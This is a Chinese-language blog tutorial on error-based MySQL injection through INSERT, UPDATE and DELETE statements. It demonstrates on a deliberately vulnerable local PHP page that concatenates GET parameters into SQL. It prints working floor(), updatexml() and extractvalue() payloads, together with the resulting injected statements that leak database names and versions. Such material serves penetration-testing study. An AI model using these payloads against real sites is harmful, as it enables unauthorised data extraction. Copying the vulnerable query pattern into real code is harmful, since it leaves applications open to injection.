mysql注入 update_MySQL三种报错注入方式下的insert,update,delete命令注入示例

最新推荐文章于 2023-06-22 11:31:52 发布
最新推荐文章于 2023-06-22 11:31:52 发布
阅读量299 收藏 1
点赞数
文章标签: mysql注入 update
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39918248/article/details/113165201
版权

select 查询数据(大部分)

在网站应用中进行数据显示查询操作

insert 插入数据

在网站应用中进行用户注册添加等操作

delete 删除数据

后台管理里面删除文章删除用户等操作

update 更新数据

数据同步缓存等操作

通过以上查询方式与网站应用的关系,可以由注入点产生地方或应用猜测到对方的SQL查询方式

注意:扫描工具一般不能扫描到insert,updata,delete命令的注入点,因为交互过程复杂,涉及到用户登录状态,用户行为交互等方面,这就需要手工测试了

模拟网站环境执行SQL命令:

本地模拟网站输入用户名

$id=$_GET['i'];

$users=$_GET['u'];

$pass=$_GET['p'];

$sql="insert into users (id,name,password) values ('$id','$users','$pass');";

echo $sql;?>

9cc99d32842c80da432faf3321f418a5.png

指定u参数即可生成插入数据库的SQL命令

同时在任意数据库中新建以下表:

f23e7436fb22c74cd81bf21273b8cd3e.png

insert语句

INSERT INTO 语句用于向表格中插入新的行。

语法

INSERT INTO 表名称 VALUES (值1, 值2,....)

我们也可以指定所要插入数据的列:

INSERT INTO table_name (列1, 列2,...) VALUES (值1, 值2,....)

floor()报错演示Payload:

insert插入命令:

一般出现在注册是新建昵称等插入文字的地方

本地参数u中用户名输入:

Olivia'or (select 1 from(select count(*),concat( floor(rand(0)*2),0x7e,(database()),0x7e)x from information_schema.character_sets group by x)a) or'

ac2b9338188d583b0e5016381a6e540d.png

执行的完整SQL语句

insert into users (id,name,password) values ('','Olivia' or (select 1 from(select count(*),concat( floor(rand(0)*2),0x7e,(database()),0x7e)x from information_schema.character_sets group by x)a) or '','');

复制到SQL数据库中执行

4004cd4f2b19533a88f4d0af60b62b14.png

可以看到执行之后显示出数据库名

同理可推断出数据库update(网站个性签名等地方)与delete(网站帖子管理等地方)命令的注入方式:

update命令

update users set passowrd='Nicky' or (select 1 from(select count(*),concat( floor(rand(0)*2),0x7e,(database()),0x7e)x from information_schema.character_sets group by x)a) or '' where id=2;

数据库执行

7d85fb80be7c14f833ad69c18eed64dd.png

delete命令

delete from users where id=1 or (select 1 from(select count(*),concat( floor(rand(0)*2),0x7e,(database()),0x7e)x from information_schema.character_sets group by x)a);

c0e8e3e1b0d5298b2b501bfa116ab9e5.png

updatexml()报错演示Payload

insert命令:

aeff9edfbea229dd3145f174c93f477d.png

用户名输入:

Olivia'or updatexml(1,concat(0x7e,(version())),0) or'

7011ac7991d6b73c8116135c7d498c7e.png

复制去数据库执行

cc594136193161767fcaa16330c92418.png可以看到把数据库的版本查询出来了

同理可推断出数据库update(网站个性签名等地方)与delete(网站帖子管理等地方)命令的注入方式:

update命令

update users set password='Olivia' or  updatexml(1,concat(0x7e,(version())),0) or '' where id=2;

afd5c29ee0e122cb50e96a58a7e7914d.png

delete命令

delete from users where id=2 or updatexml(1,concat(0x7e,(version())),0) or '';

f6418e6eb7b4bad45274ea01d75a8a73.png

extractvalue()报错演示Payload

insert命令:

用户名输入:

Olivia'or extractvalue(1,concat(0x7e,database())) or'

7034ba8e498c2490ca1248030b12216e.png

update命令

update users set password='Olivia' or extractvalue(1,concat(0x7e,database())) or '';

eba0282084a82bea72b13a20f0e3d1a2.png

delete命令

delete from users where id=1 or extractvalue(1,concat(0x7e,database())) or '';

6406d9615933aa76c29c910b259995c6.png

weixin_39918248
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
基于insert/update/delete注入
北冥有鱼
03-31 7158
之前的数字型,字符型,搜索型,都是通过selecte进行的一个操作,如果是insert/update/delete 需要一个怎样的操作呢 我们直接通过pikachu上的靶场来看一下 这边有一个注册按钮,点一下注册 还是老方法,用单引号确认是否存在注入点 发现返回了错误,说明这里是存在注入点的,我们知道这个地方的后端是用的insert,怎么样利用insert来进行操作呢? 这个地方正常来...
Sqli-labs-master(1-65)
kfjrlgagkogkhpa的博客
08-11 521
sqli-lab(1-65)
SQL注入Update注入
weixin_43765321的博客
03-03 5551
1. MySQL中的update函数 如果我们需要修改或更新MysQL中的数据,我们可以使用SQLUPDATE命令来操作。首先更新某一行中的一个列。 UPDATE table SET column=mew_value WHERE column= value 为lastname 是"Wilson”的人添加firstname : UPDATE Person SET FirstName = 'Fred WHERE LastName = ‘Wilson’ 更新某一行中的若干列 UPDATE table SET c
mysqlupdate insert_mysqlupdateinsert常用详细说明
weixin_34404808的博客
02-07 2272
软件安装:装机软件必备包SQL是Structured Query Language(结构化查询语言)的缩写。SQL是专为数据库而建立的操作命令集,是一种功能齐全的数据库语言。在使用它时,只需要发出“做什么”的命令,“怎么做”是不用使用者考虑的。SQL功能强大、简单易学、使用方便,已经成为了数据库操作的基础,并且现在几乎所有的数据库均支持SQL。本文主要内容:update更新,batch批量更新in...
MySQL报错注入方法整理
jpygx123的博客
11-17 9571
mysql暴错注入方法整理,通过floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection等方法。 报错注入:(and后不能直接跟select,可以加()) 1.报错注入floor---->(select 1 from (select count(*),concat((payload[]),floo...
Upload-Insert-Update-Delete-Image-PHP-MySQL.rar_msql
09-23
综上所述,"Upload-Insert-Update-Delete-Image-PHP-MySQL.rar_msql"压缩包包含了一套完整的Web应用示例,用于展示如何利用PHP处理用户上传的图片,并结合MySQL数据库进行数据管理。通过理解这些概念和技术,开发者...
MYsql.rar_MYSQL_c# mysql_mysql C#_mysql c#_侨联
09-22
`MySqlCommand`支持多种命令类型,如SELECT、INSERTUPDATEDELETE。执行非查询命令(如INSERTUPDATE)时,使用`ExecuteNonQuery()`方法。读取数据时,`MySqlDataReader`对象用于遍历结果集。 在C#中处理事务也...
MySQL.zip_DEMO_c mysql_c# mysql_database_example
09-23
MySQL.zip_DEMO_c 是一个关于在C#环境下使用MySQL数据库的示例项目,适用于Visual Studio开发平台。这个压缩包包含了创建、操作和管理MySQL数据库所需的关键知识点,旨在帮助开发者了解如何在C#应用中集成MySQL...
MySQL-demo(4DELPHI)_MYSQL示例4Delphi_
09-28
- 编辑`sqlQuery1`的SQL语句,以执行所需的操作(如SELECT、INSERTUPDATEDELETE)。 - 将`datasetProvider1`的`dataset`属性设置为`sqlQuery1`,使数据可以通过数据绑定控件显示。 - 运行`ProjectMYSQL_demo....
mysql_test_c__by_wy.rar_MYSQL_mysql api_mysql c++
09-21
MySQL是世界上最受欢迎的关系型数据库管理系统之一,而MySQL C API 是MySQL提供的一种用于在C或C++编程语言中与MySQL服务器进行交互的接口。本示例"mysql_test_c__by_wy.rar"旨在演示如何利用MySQL C API进行基本的...
利用insertupdatedelete注入获取数据
阿金正传
04-18 1万+
转自: http://drops.wooyun.org/tips/2078 0x00 简介 利用SQL注入获取数据库数据,利用的方法可以大致分为联合查询、报错、布尔盲注以及延时注入,通常这些方法都是基于select查询语句中的SQL注射点来实现的。那么,当我们发现了一个基于insertupdatedelete语句的注射点时(比如有的网站会记录用户浏览记录,包括refer
22、注入篇————MYSQL数据库updatexml报错注入
Fly_鹏程万里
03-02 6859
MYSQL数据库updatexml报错注入爆数据库版本信息http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)链接用户http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT user...
mysql insert sql注入_利用insertupdatedelete注入获得数据
weixin_39571749的博客
02-03 612
前言最近在进行代码审计,其中遇到了update、delte语句存在注入的问题就找来了这篇文章看看,同时也加强以下自己对报错注入的理解。以下是文章原文。如果不想看原文,可以直接看文章最后的我的总结一章。本文转载自wooyun drops文章,《利用insertupdatedelete注入获得数据》。以下是文章原文,如有侵权,望告知。简介利用SQL注入注入获取数据库数据,利用的方法可以大致分为联合...
insertupdatedelete 注入方法
黑面狐
11-28 4975
我们常见的注入都是select的查询注入比较多,但是SQL注入在参数没有检查和过滤的时候就会把恶意的数据插入数据库,从而造成SQL注入。 所有说除了查询之外,所有和数据库进行交互的请求都有可能造成注入。如:插入数据,更改数据,删除数据等,所以现在根据网上的技巧汇总一下insertupdatedelete注入方法。 以下均为报错注入,测试数据库版本5.7.21 利用内置函数updatex...
渗透测试:详解sqlmap进行POST注入、基于insert注入(以vulnhub靶机LampSecurity:CTF7为例)
最新发布
Bossfrank的博客
06-22 4622
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
学习基于extractvalue()和updatexml()的报错注入
热门推荐
超人学飞的日子
06-09 5万+
extractvalue()extractvalue() :对XML文档进行查询的函数其实就是相当于我们熟悉的HTML文件中用 <div><p><a>标签查找元素一样语法:extractvalue(目标xml文档,xml路径)第二个参数 xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报...
sqli-labs less-17 updatexml()报错注入
cuddlylm的博客
04-02 1724
这题相比前面的11到15关由原来的登陆注册框变成了现在的重置密码框 首先阅读源码发现 该题先审查user name的值,只有当user name的值是真值的时候才会处理下一步的new password 重点引入了update函数 $update="UPDATE users SET password = '$passwd' WHERE username='$row1'"; 这个函数的作用就是更新数据库 updatexml()函数 UPDATEXML (XML_document, XPath_string,.
【SQL注入UPDATEinsertdelete注入
07-08 3279
【SQL注入
mybatis+mysql +insert 外键约束报错
05-19
在 MyBatis 中使用 MySQL 数据库时,可能会遇到插入数据时外键约束报错的问题。这通常是因为插入的数据中涉及到外键关联的表,而插入的数据中的外键值在关联表中不存在。 解决这个问题的方法有以下几种: 1.检查...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值